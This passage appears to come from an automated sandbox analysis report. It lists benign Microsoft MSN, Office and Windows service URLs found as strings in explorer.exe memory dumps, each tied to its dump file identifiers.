            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3086278814.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337843154.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
            Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
            Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
            Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
            Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
            Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
            Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000014.00000000.1348137626.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757850550.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2293895318.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084622640.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
            Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
